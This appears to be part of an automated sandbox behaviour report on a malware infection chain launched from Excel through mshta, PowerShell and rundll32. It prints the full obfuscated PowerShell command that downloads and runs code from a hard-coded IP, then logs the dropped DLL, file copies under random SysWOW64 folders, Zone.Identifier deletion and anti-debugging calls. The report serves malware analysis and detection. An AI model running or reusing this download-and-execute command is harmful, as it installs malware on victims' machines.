                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgSJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVCJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD142.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002A5988 CreateToolhelp32Snapshot,17_2_002A5988
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 32E3.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x8e522
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 1992Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000A.00000002.529168355.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000F.00000002.608665312.00000000004CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002A7E00 FindFirstFileW,17_2_002A7E00
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00384087 mov eax, dword ptr fs:[00000030h]9_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]10_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00284087 mov eax, dword ptr fs:[00000030h]11_2_00284087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00194087 mov eax, dword ptr fs:[00000030h]12_2_00194087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00264087 mov eax, dword ptr fs:[00000030h]14_2_00264087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00234087 mov eax, dword ptr fs:[00000030h]15_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_003B4087 mov eax, dword ptr fs:[00000030h]16_2_003B4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002B4087 mov eax, dword ptr fs:[00000030h]17_2_002B4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
